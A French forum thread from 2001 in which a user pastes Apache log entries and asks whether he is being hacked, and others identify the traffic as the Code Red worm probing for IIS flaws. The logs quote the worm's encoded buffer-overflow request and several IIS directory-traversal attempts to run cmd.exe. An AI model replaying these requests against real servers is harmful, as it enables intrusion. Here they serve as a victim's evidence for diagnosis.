Je crois qu'on essaie de me hacker.

Recherche :

Mot : Pseudo : Filtrer
Bas de page
Auteur	Sujet : Je crois qu'on essaie de me hacker.

dragonspirit

Je constate dans les logs de mon serveur Apache quelques trucs louches:
62.11.34.190 - - [23/Sep/2001:23:25:20 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 279
62.57.105.144 - - [23/Sep/2001:23:33:39 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 279
62.4.166.209 - - [24/Sep/2001:00:04:44 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 279
62.4.178.245 - - [24/Sep/2001:00:27:51 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 279
62.4.178.245 - - [24/Sep/2001:02:40:56 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 279
62.81.157.44 - - [24/Sep/2001:03:06:55 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 279
203.65.201.241 - - [24/Sep/2001:05:46:04 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 279
62.4.139.111 - - [24/Sep/2001:20:36:47 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
62.4.139.111 - - [24/Sep/2001:20:36:49 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
62.4.139.111 - - [24/Sep/2001:20:36:51 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
62.4.139.111 - - [24/Sep/2001:20:36:57 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
62.4.139.111 - - [24/Sep/2001:20:36:59 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
62.4.139.111 - - [24/Sep/2001:20:37:10 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
62.4.139.111 - - [24/Sep/2001:20:37:14 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
62.4.139.111 - - [24/Sep/2001:20:37:22 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

Voilà, à mon avis, le mec essaie de me hacker à coup de buffer overflow, et essaie de lister les fichiers contenus sur mon disque dur. Heureusement, ça ne passe pas. Que puis-je faire? En le traçant, la connection viendrait du fournisseur d'accès www.zeelandnet.nl . A mon avis, il doit se servir de leur proxy. Que puis-je faire contre ça?

Publicité

Webmaniaq

Bien le bonjour
T'inkiet pas, c une attaque du Worm Code Red (ou un de ses nombreux dérivés) qui cherche une faille sur les serveur IIS de Microsoft. C un ver qui se propage de serveur en serveur en attaquant aléatoirement des IP (enfin, plus ou moins, c comme ça qu'il marche). Rien de grave si ton serveur n'est pas IIS (ce qui est le cas
C chiant, mais y'a rien à y faire, g eu le tour aussi sur un serveur...

Qu'on me corrige si je me trompe :sarcastic:

Webmaniaq

Pour complément d'infos

http://www.cert.org/advisories/CA-2001-19.html

et hop

dragonspirit

ok, ça va alors
Ca signifierait donc que ce serveur est infecté par le virus... dommage pour eux !

dragonspirit

thanks

niark niark, fuck IIS :gun:

schumacher

Web, kestu fou ici :??:

Tu crois que c bien :ouch: et Auchan alors, comment ils vont tourner si tu passes ta journée sur le net à rien foutre ? :hap:

A+ :hello:

---------------
L'impôt appauvrit l'ignorant et enrichit le connaisseur.

FORUM HardWare.fr

Windows & Software

Je crois qu'on essaie de me hacker.

Sujets relatifs
etre prevu qu'on essaie de nous joindre alors que l'on est sur interne	Avis au hacker, un site fait pour etre piraté...
HACKER en ligne, comment s'en débarrasser?	Hacker
www.chez.com s'est fait hacker ?	Je me suis fait hacker ????
pour ceux dont le speedtouch essaie de se faire la malle	Le site de loftstory hacker hahahahaha !!!!!
Ca y est Neuilly se met à hacker	Asus c'est fait hacker !!!
Plus de sujets relatifs à : Je crois qu'on essaie de me hacker.

Page générée en 0.045 secondes